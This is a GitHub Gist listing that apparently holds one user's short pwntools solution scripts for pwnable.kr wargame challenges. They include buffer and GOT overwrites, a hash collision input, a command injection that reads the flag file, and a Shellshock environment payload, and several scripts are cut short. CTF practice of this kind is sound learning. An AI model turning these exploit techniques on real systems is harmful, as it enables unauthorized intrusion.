Skip to content

Instantly share code, notes, and snippets.

View parksjin01's full-sized avatar
:octocat:
Get a first job

Damotorie parksjin01

:octocat:
Get a first job
6 followers · 10 following
  • Korea, Anyang
View GitHub Profile
@parksjin01
parksjin01 / pwnable.kr fd writeup.md
Last active March 16, 2017 20:52
pwnable.kr fd writeup 
from pwn import *
sh = ssh(host='pwnable.kr', user='fd', password='guest', port=2222)
proc = sh.process(['/home/fd/fd', '4660'])
proc.sendline('LETMEWIN')
proc.recv(1024)
@parksjin01
parksjin01 / pwnable.kr col writeup.md
Last active March 16, 2017 20:51
pwnable.kr col writeup 
from pwn import *
sh = ssh(host='pwnable.kr', user='col', password='guest', port=2222)
proc = sh.process(['/home/col/col', '\xc8\xce\xc5\x06'*4+'\xcc\xce\xc5\x06'])
print proc.recv(1024)
@parksjin01
parksjin01 / pwnable.kr bof writeup.md
Last active March 16, 2017 20:55
pwnable.kr bof writeup 
from pwn import *
sh = remote('pwnable.kr', 9000)
sh.sendline('a'*52+'\xbe\xba\xfe\xca')
sh.interactive()
@parksjin01
parksjin01 / pwnable.kr mistake writeup.md
Last active March 16, 2017 20:44
pwnable.kr mistake writeup 
from pwn import *
import time
sh = ssh(host='pwnable.kr', user='mistake', password='guest', port=2222)
passwd = raw_input(text.green_on_black('Plz type password(password should be 10 chars)')).strip()
while len(passwd) != 10:
        passwd = raw_input(text.green_on_black('Plz type password(password should be 10 chars)'))
chpasswd = ''
for i in passwd:
 chpasswd += chr(ord(i)^1)
@parksjin01
parksjin01 / pwnable.kr random writeup.md
Last active March 16, 2017 20:51
pwnable.kr random writeup 
from pwn import *
sh = ssh(host='pwnable.kr', user='random', password='guest', port=2222)
proc = sh.process('/home/random/random')
proc.sendline('3039230856')
print proc.recv(1024)
@parksjin01
parksjin01 / pwnable.kr cmd1 writeup.md
Last active March 12, 2018 21:42
pwnable.kr cmd1 writeup 
from pwn import *
sh = ssh(host='pwnable.kr', user='cmd1', password='guest', port=2222)
proc = sh.process(['/home/cmd1/cmd1', '/bin/cat fl*'])
print proc.recv(1024)
@parksjin01
parksjin01 / pwnable.kr passcode writeup.md
Last active March 16, 2017 20:52
pwnable.kr passcode writeup 
from pwn import *
sh = ssh(host='pwnable.kr', user='passcode', password='guest', port=2222)
proc = sh.process('/home/passcode/passcode')
print proc.recv(1024)
proc.sendline('a'*96+'\x04\xa0\x04\x08')
print proc.recv(1024)
proc.sendline('134514147')
print proc.recvuntil(':(')
@parksjin01
parksjin01 / pwnable.kr lotto writeup.md
Last active March 16, 2017 20:43
pwnable.kr lotto writeup 
from pwn import *
sh = ssh(host = 'pwnable.kr', user='lotto', password = 'guest', port=2222)
proc = sh.process('/home/lotto/lotto')
proc.recv(1024)
while True:
	proc.sendline('1')
	proc.recv(1024)
	proc.sendline('######')
	a = proc.recv(1024)
@parksjin01
parksjin01 / pwnable.kr coin1 writeup.md
Last active March 16, 2017 20:50
pwnable.kr coin1 writeup 
from pwn import *
sh = remote('pwnable.kr', 9007)
sh.recv(10024)
for _ in range(100):
	tmp = sh.recv(1024).strip().split(' ')
	n = int(tmp[0].split('=')[1])
	c = int(tmp[1].split('=')[1])
	s = 0
	e = n
@parksjin01
parksjin01 / pwnable.kr shellshock writeup.md
Last active March 16, 2017 20:51
pwnable.kr shellshock writeup 
env x='() { :;}; /bin/cat flag' ./shellshock

It should be executed in ssh [email protected] -p 2222 not in your computer